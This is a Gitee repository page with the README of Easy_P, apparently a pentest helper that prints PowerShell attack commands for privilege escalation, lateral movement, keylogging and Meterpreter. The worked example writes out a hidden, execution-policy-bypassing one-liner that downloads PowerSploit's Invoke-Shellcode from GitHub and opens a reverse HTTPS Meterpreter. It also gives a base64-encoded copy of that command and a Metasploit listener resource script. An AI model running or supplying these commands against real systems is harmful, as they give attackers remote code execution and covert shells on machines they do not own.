1 Star 0 Fork 0

laoyang2020/Easy-P

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
贡献代码
同步代码
取消
提示: 由于 Git 不支持空文件夾,创建文件夹后会生成空的 .keep 文件
Loading...
README
< About >

	Easy_P is a tool used for showing a user which PowerShell scripts to use in a penetration test, depending on the users needs. There are 7 different sections of this tool-
	
		[1] Privilege Escalation
		[2] Lateral Movement
		[3] Keylogging
		[4] PowerShell Meterpreter (Reverse HTTPS)
		[5] Change Users Execution Policy
		[6] Powershell 101
		[7] Base64 Encode a PowerShell Script

	Each option reflects what kinds of scripts are available, and what they are used for. These scripts have proven their value during pentests, which is why I've written this
	tool to show the user exactly how a PowerShell script should be executed in their specific situation, such as using a base64 encoded version of the script or executing a
	script to download a PowerShell script from the Internet and execute it.

	For example, let's say a user is in a pentest, and they have a remote Windows shell on a target machine, but they want to utilize PowerShell within their normal shell to
	gain a Metasploit Meterpreter. They can run Easy_P, select [4] for the "PowerShell Meterpreter (Reverse HTTPS)" option, supply their listening IP address and listening port for their reverse
        Meterpreter payload, and they're presented with the following-

		[*]Download from internet and execute:
           	  Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); 
                  Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost localhost -Lport 1337 -Force

		[*]Run from a local copy of the script:
		  powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-Shellcode.ps1; 
                  Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost localhost -Lport 1337 -Force}"

		[*]Base64 encoded version download and execute:
		  powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc 
                  SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA
                  GQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBtAGEAdAB0AGkAZg
                  BlAHMAdABhAHQAaQBvAG4ALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEMAbwBkAGUARQB4AGUAYwB1AHQ
                  AaQBvAG4ALwBJAG4AdgBvAGsAZQAtAFMAaABlAGwAbABjAG8AZABlAC4AcABzADEAJwApADsAIABJAG4AdgBvAGsAZQAtAFMAaABl
                  AGwAbABjAG8AZABlACAALQBQAGEAeQBsAG8AYQBkACAAdwBpAG4AZABvAHcAcwAvAG0AZQB0AGUAcgBwAHIAZQB0AGUAcgAvAHIAZ
                  QB2AGUAcgBzAGUAXwBoAHQAdABwAHMAIAAtAEwAaABvAHMAdAAgAGwAbwBjAGEAbABoAG8AcwB0ACAALQBMAHAAbwByAHQAIAAxADMAMwA3ACAALQBGAG8AcgBjAGUA

		[*]Listner Resource Script (listener.rc) - Save the following to a file called listener.rc on your machine and load your handler with msfconsole -r listener.rc
                                                           Then, execute your desired PowerShell script.
		  use multi/handler 
		  set payload windows/meterpreter/reverse_https 
		  set LHOST <user-defined-listener-ip>
		  set LPORT <user-defined-listener-port>
		  set ExitOnSession false 
		  exploit -j

	
	In this case, the user can use the first option, and execute a PowerShell command to download the script for his Meterpreter from the Internet after setting up his 
        multi/handler (from executing his Listener Resource Script). The script downloaded from the Internet will execute and connect back to his Listener. With the use
	of Easy_P, the user saved time by not having to remember of look up the proper syntax of the command to execute against the target machine he's gained access to, as
	well as being presented with several options for the use of his script that they can apply to their specific situation.

< Usage >

	Simply run-
	  
	  python easy_p.py

	You will then be presented with the menu for Easy_P.

空文件

简介

PowerShell Helper Tool 展开 收起
取消

发行版

暂无发行版

贡献者

全部

近期动态

加载更多
不能加载更多了
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
1
https://gitee.com/laoyang2020/Easy-P.git
git@gitee.com:laoyang2020/Easy-P.git
laoyang2020
Easy-P
Easy-P
master

搜索帮助

0d507c66 1850385 C8b1a773 1850385